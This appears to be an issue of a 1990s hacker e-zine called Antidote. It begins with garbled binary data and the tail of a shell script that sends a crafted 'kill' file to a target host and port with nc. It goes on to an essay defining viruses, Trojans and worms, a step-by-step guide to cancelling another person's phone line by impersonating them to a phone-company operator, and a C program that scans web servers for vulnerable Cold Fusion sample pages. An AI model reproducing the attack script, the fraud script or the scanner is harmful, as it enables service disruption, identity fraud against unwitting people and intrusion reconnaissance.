$6]}tTյ?"̐ap/HD0iA1/2L%̂EBEԁ'*}yԥ(3znuԏj+(-քd'(tm)ZiXy7 '``3/41/2ϝ Cʹ1/2>ܐE6^^v?^:{n"u'g=o 8Ӂ'L5"鲱ᤁDRGIlqYgii3/4HHw1/23l*o#sC9m, _EOF_ echo "" echo "Sending kill..." cat ipp00p | nc $1 $2 echo "Done." rm -f ipp00p fi fi ------------------------------ --=\\2.00\\=-- 2.01 --=\\Understanding a computer virus\\=-- INTRODUCTION "Information wants to be free!" In the last few years, much has been said and text files wrote about computer viruses. Many rumors, but few straight facts, have led people to be aware of possible problems but have not shown an effective way to deal with them. Today most computer users know of computer viruses, but few know how, or bother to take even the most basic precautions against them. The majority of all virus infections, and the subsequent destroyed data, could be pretend by a few easy steps. Unfortunately, people with the right kind of insight have long considered it a good policy not to share their knowledge with outsiders. In fear that some people would misuse this information to create more malicious viruses, it has generally been frowned upon to write a text in this area. Obviously this "protection by ignorance" has done no good. Its failure can be seen in the thousands of viruses already in existence, and the new ones constantly appearing. Virus programmers have had no problems obtaining this information they need to program viruses, but other computer users seek information on how to protect themselves have been left in the dark. How can anybody protect them selves from what they do not understand? The idea of dangerous, forbidden knowledge has always been particular distasteful to me. Trying to keep information from people, besides being impossible, has never led to any good. Information needs to be free! Definition "Don't buy a computer" Before going any further in the virus discussion, we need to get a few things clear. What exactly is a computer virus? How dose a computer virus differentiate itself from other damaging programs and from other "normal" programs? There has been some confusion on what viruses actually are and what they are not. Often the designation "computer virus" is used simply to denote any destructive program. This, strictly speaking, is not correct. In this text I will try to reach a clear definition of "computer virus" and other computer mischief programs. There are basically three different kinds of these programs: viruses, Trojan horses, and worms. Generally, it can be said that these programs gain access to places and/or perform actions not intended by the user, often damaging data in the process. However, the exact phrases often get misused and mixed. That is not surprising, considering the difficulty even experienced computer users can have in obtaining the "hard" technical information needed to understand the concepts involved. Furthermore, methods that can successfully defend you against one type may have no effect against another. It is important to know what these "rouge" programs do, if you are to defend yourself against them. Virus The first computer virus for a personal computer was discovered (and created) around 1980.That means we've had about 15 years to get acquainted with them and used to their presence. Computer viruses are not short-lived curiosity; that, are today and will continue to be here for as long as anyone can foresee. They are sufficiently widespread to be a real danger to most computers, requiring people using computers to have at least a basic knowledge of their workings if they want to avoid infections. And even though the term "computer virus" is well known even among people with little computer experience, what a computer virus actually signifies remains a mystery to most people. At least this is no mystery, since there is disagreement on what a computer virus is, and what it's not, even among people specialized in the computer virus fields. There is no general, agreed-upon definition. Still, let's look at some of the basic requirements that must be true before a program can be called a virus. First, like a biological virus, a computer virus exists to replicate; infinite cannot replicate, it's not a virus. A biological virus replicates to spread, its DNA. A computer virus can replicate to spread its program code, just as a biological virus changes inn the cells' own DNA to force them to make new viruses, a computer virus modifies the code in the programs it targets to make new computer viruses. The term, "computer virus" was coined by Fred Cohen in the first paper discussing the theoretical aspects of computer virus programs. His thesis was published as early as 1984, in the days when a virus was still an interesting novelty. However, perhaps because it appeared before many viruses that propagate by attaching themselves directly to other programs. This is a bit narrow for today's use and does not contain many of the programs that today we call viruses, namely those that propagate by attaching themselves to floppy/hard disks instead of specific programs (partition/boot infectors). If we just broaden Cohen's definition to include those disk-infecting viruses, we can cover all the different virus types in existence today and still have a small group with common characteristics. 1. A virus is self-replicating program whose main (only) purpose is to propagate itself to as many different places as possible. 2. A virus propagates itself by modifying another program to include itself. 3. (This is the crutch) A virus can only propagate itself by an (unknowing) act of a user of the system in which it exists. A small note on the plural "virus" is Latin, meaning poison. In Latin it is a "mass" word, like water and air in English, and as such has no Latin plural. Its correct English plural is viruses, though often others are seen, like viri and virii. Trojan Horse Trojan horses are simply programs that feign, by their name or their documentation, to do one thing, when in fact they do something else entirely, something often very destructive. Trojan horses are not very common and (contrary to viruses) are found mostly on "Computer Bulletin Boards". Trojans' spreading potential is not very big, because once they are run they give them selves away (cease to be Trojans), and the only way for a trojan to propagate itself would be for a user to copy it to somewhere else. Besides the author, few people would knowingly spread them (or any other destructive program, for that madder). A typical trojan horse could simply be a program given the name of another known program, which would be tempting for an unsuspecting user to start. A number of Trojans pretending to be anti- virus or anti-Trojan software have been circulated. The name "Trojan horse" came from the wooden horse the ancient Greek army used to conquer the city of Troy and save the beautiful Helen. Worm A worm can be defined as a program propagating itself in a network of computers, using bugs, which are unforeseen (by the designers and users) side effects of the operating system, or breaking (guessing) passwords to gain access to other machines in the network. Contrary to viruses, no user interactions are needed for the worm to spread. Worms need no host program to propagate; viruses are parasitic, worms are not. Periodically, rumors surface of worms existing in a DOS environment, using modem to propagate them selves. However, that is just a rumor. No worm has ever spread using a modem as a channel. Even though it is possible to make a worm for a DOS system spreading itself in a network of PCs, few have been spotted, mainly because of the limited size of such networks. Today there are only a few computer networks with sufficient size to enable a worm to be anything but a local menace: the internet. There have been two major outbreaks of worms on the internet, the not-so-famous Christmas Exec mail worm of 1987 and the very famous (infamous) Morris internet worm of 1988. Written by, EazyMoney eazy_money@Cyber-Strike.com ------------------------------ 2.02 --=\\Dropping Phonelines\\=-- This is one of the best thangs i ever figerd out and it is easy as 1,2,3 I wrote this for educational use only!! If you fuck up and get busted it is not my ass it is yours. here we go you phone addicts: -Step 1. Go to a COCOT (Customer Owned Coin Operated Telephone.). Now dial up a pbx (Private Branch Exchange) all you got to do now is dial up the phone company. -Step 2. call the operator and tell him/her you would like to cancel your account with the service. here is how it will probley go: -- (operator) (phone companyname and his/her name) how may I help you? (you) I would like to cancle my acount with your service. (oparator) What is your name sir/madom and your area code-prefix-number? (you) Blah blah (the lamers name that is listed in the phone book) (oparator) Mr.blah/Ms.blah we need your acount and access number to go any farther. (you) What is what? (oparator) It is the digits on top of your last phone bill. (you) See that is why I want to cancle my account reason being I all ever get the bill or any thang of that type and at&t/sprint/mci has a lot better deal then you guys have. (oparator) Sorry Mr.blah/Ms.blah I can't cancle your phone line with out the account and access number. (you) Well it is not my falt that I don't ever get the bill from your company and it is your falt. (oparator) I am sorry you feel this way here is what you can do come in to our office on(blah) (you) Look I am not like other pepole I can't get out of the house I got this disorder and I can't have any one to go there just cancle the number please this will save us both time. (oparator) Please hold Mr.blah/Ms.blah (you) ok (oparator) Your phone number has now be cancled thank you for using our service. (you) Yea ok bye -- -Step 3. Hang the phone up and get the fuck out of the area. If on feet and you see the pigs don't fucking freak out. Same if you are driveing.All pigs are gay and dumb soo chill. EazyMoney eazy_money@Cyber-Strike.com ------------------------------ 2.03 --=\\Cold Fusion Scanner\\=-- /* Usage: $ gcc -o cfscan cfscan.c -w (hey i don't want my warnings shown :P) $ ./cfscan www.antionline.com > tinylog.txt $ echo PBBSER 0wns me Greets: Groups: Phukt Security, The LegionOOT, Team Spl0it, & gH Channels (various servers): #hacktech, #hyperlink, #3xposure, #c, #./hack, #ek & #phukt People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X, NeonMatrix, Azmodan, v0rt-fu, Tainted Angel, cpu, tw1ster, ultr4k- the intellimouse hax0r, ... the list goes on and on... */ #include #include #include #include #include #include void main(int argc, char *argv[]) { int sockfd; struct sockaddr_in host; struct hostent *he; int port = 80; char *gets[4]; char getbuff[1000]; char *check; gets[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; gets[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; gets[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; system("clear"); printf("\t\tCold Fusion Vulnerability Scanner\n"); printf("\t\tBy PBBSER -- Phukt Security Coming At You\n"); if (argc != 2) { printf("\nUsage: %s [host]\n", argv[0]); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { perror("getting hostname"); exit(0); } sockfd=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&host.sin_addr, he->h_length); host.sin_family=AF_INET; host.sin_port=htons(port); if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0) { perror("connect"); } printf("connected\n"); send(sockfd, gets[1],strlen(gets[1]),0); recv(sockfd, getbuff, sizeof(getbuff),0); check = strstr(getbuff,"200"); if(check != NULL) { printf("openfile.cfm found\n"); } else { printf("openfile.cfm wasn't found, so we are gunna exit\n"); close(sockfd); exit(0); } close(sockfd); sockfd=socket(AF_INET, SOCK_STREAM, 0); host.sin_family=AF_INET; host.sin_port=htons(port); if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0) { perror("connect"); } send(sockfd, gets[2],strlen(gets[2]),0); recv(sockfd, getbuff, sizeof(getbuff),0); check = strstr(getbuff,"200"); if(check != NULL) { printf("exprcalc.cfm found\n"); } close(sockfd); sockfd=socket(AF_INET, SOCK_STREAM, 0); host.sin_family=AF_INET; host.sin_port=htons(port); if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0) { perror("connect"); } send(sockfd, gets[3],strlen(gets[3]),0); recv(sockfd, getbuff, sizeof(getbuff),0); check = strstr(getbuff,"200"); if(check != NULL) { printf("displayopenedfile.cfm found\n"); } close(sockfd); printf("\nWe're done. Word.\n"); } PBBSER pbbser@legionoot.hypermart.net ------------------------------ Please visit: http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242 to help us pay the bills. Please take to seconds out of your time and go there. _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art is done by Lord Oak and permission is needed from him before using.